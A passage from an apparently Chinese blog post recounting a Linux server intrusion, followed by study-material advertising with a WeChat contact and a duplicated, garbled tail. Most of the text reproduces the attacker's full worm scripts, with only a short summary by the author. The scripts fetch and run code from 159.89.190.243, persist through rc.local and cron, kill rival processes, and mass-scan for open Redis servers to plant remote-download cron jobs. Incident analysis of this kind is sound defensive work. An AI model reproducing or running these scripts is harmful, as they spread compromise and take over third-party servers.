记一次Linux被入侵,服务器变(2),带你快速通过字节跳动面试

avatar
作者
猴君
阅读量:2

fi

sleep 1

echo 1 > .watch

sleep 1

ps x | awk ‘!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}’ | xargs kill -9 2>/dev/null

ps x | awk ‘!/awk/ && /barad_agent|masscan|.sr0|clay|udevs|.sshd|xig/ {print $1}’ | xargs kill -9 2>/dev/null

sleep 1

if ! [ -x /usr/bin/gpg-agentd ]; then

curl -s -o /usr/bin/gpg-agentd 159.89.190.243/dump.db

echo ‘/usr/bin/gpg-agentd’ > /etc/rc.local

echo ‘curl -fsSL 159.89.190.243/ash.php|sh’ >> /etc/rc.local

echo ‘exit 0’ >> /etc/rc.local

fi

sleep 1

chmod +x /usr/bin/gpg-agentd && /usr/bin/gpg-agentd || rm -rf /usr/bin/gpg-agentd

sleep 1

if ! [ -x “$(command -v masscan)” ]; then

rm -rf /var/lib/apt/lists/*

rm -rf x1.tar.gz

if [ -x “$(command -v apt-get)” ]; then

export DEBIAN_FRONTEND=noninteractive

apt-get update -y

apt-get install -y debconf-doc

apt-get install -y build-essential

apt-get install -y libpcap0.8-dev libpcap0.8

apt-get install -y libpcap*

apt-get install -y make gcc git

apt-get install -y redis-server

apt-get install -y redis-tools

apt-get install -y redis

apt-get install -y iptables

apt-get install -y wget curl

fi

if [ -x “$(command -v yum)” ]; then

yum update -y

yum install -y epel-release

yum update -y

yum install -y git iptables make gcc redis libpcap libpcap-devel

yum install -y wget curl

fi

sleep 1

curl -sL -o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz

sleep 1

[ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd … && rm -rf masscan-1.0.4

fi

sleep 3 && rm -rf .watch

bash -c ‘curl -fsSL 159.89.190.243/rsh.php|bash’ 2>/dev/null

这段脚本的代码比较长,但主要的功能有 4 个:

  • 下载远程代码到本地,添加执行权限,chmod u+x。

  • 修改 rc.local,让本地代码开机自动执行。

  • 下载 Github 上的开源扫描器代码,并安装相关的依赖软件,也就是我上面的 Messages 里看到的记录。

  • 下载第三个脚本,并且执行。

我去 Github 上看了下这个开源代码,简直吊炸天:

Transmitting 10 Million Packets Per Second(每秒发送 1000 万个数据包),比 nmap 速度还要快,这就不难理解为什么阿里云把服务器冻结了。

大概看了下 Readme 之后,我也没有细究,继续下载第三个脚本:

setenforce 0 2>/dev/null

ulimit -n 50000

ulimit -u 50000

sleep 1

iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null

iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null

sleep 1

rm -rf .dat .shard .ranges .lan 2>/dev/null

sleep 1

echo ‘config set dbfilename “backup.db”’ > .dat

echo ‘save’ >> .dat

echo ‘flushall’ >> .dat

echo ‘set backup1 “\n\n\n*/2 * * * * curl -fsSL http://159.89.190.243/ash.php | sh\n\n”’ >> .dat

echo ‘set backup2 “\n\n\n*/3 * * * * wget -q -O- http://159.89.190.243/ash.php | sh\n\n”’ >> .dat

echo ‘set backup3 “\n\n\n*/4 * * * * curl -fsSL http://159.89.190.243/ash.php | sh\n\n”’ >> .dat

echo ‘set backup4 “\n\n\n*/5 * * * * wget -q -O- http://159.89.190.243/ash.php | sh\n\n”’ >> .dat

echo ‘config set dir “/var/spool/cron/”’ >> .dat

echo ‘config set dbfilename “root”’ >> .dat

echo ‘save’ >> .dat

echo ‘config set dir “/var/spool/cron/crontabs”’ >> .dat

echo ‘save’ >> .dat

sleep 1

masscan --max-rate 10000 -p6379,6380 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk ‘{print $6, substr($4, 1, length($4)-4)}’ | sort | uniq > .shard

sleep 1

while read -r h p; do

cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &

done < .shard

sleep 1

masscan --max-rate 10000 -p6379,6380 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk ‘{print $6, substr($4, 1, length($4)-4)}’ | sort | uniq > .ranges

sleep 1

while read -r h p; do

cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &

done < .ranges

sleep 1

ip a | grep -oE ‘([0-9]{1,3}.?){4}/[0-9]{2}’ 2>/dev/null | sed ‘s//([0-9]{2})//16/g’ > .inet

sleep 1

masscan --max-rate 10000 -p6379,6380 -iL .inet | awk ‘{print $6, substr($4, 1, length($4)-4)}’ | sort | uniq > .lan

sleep 1

while read -r h p; do

cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &

done < .lan

sleep 60

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数Linux运维工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年Linux运维全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Linux运维知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip1024b (备注Linux运维获取)
img

最后的话

最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!

资料预览

给大家整理的视频资料:

给大家整理的电子书资料:

如果本文对你有帮助,欢迎点赞、收藏、转发给朋友,让我有持续创作的动力!

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

10)]

给大家整理的电子书资料:

[外链图片转存中…(img-9lUdP4NT-1712650326910)]

如果本文对你有帮助,欢迎点赞、收藏、转发给朋友,让我有持续创作的动力!

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-8ksPgE3w-1712650326910)]

广告一刻

为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!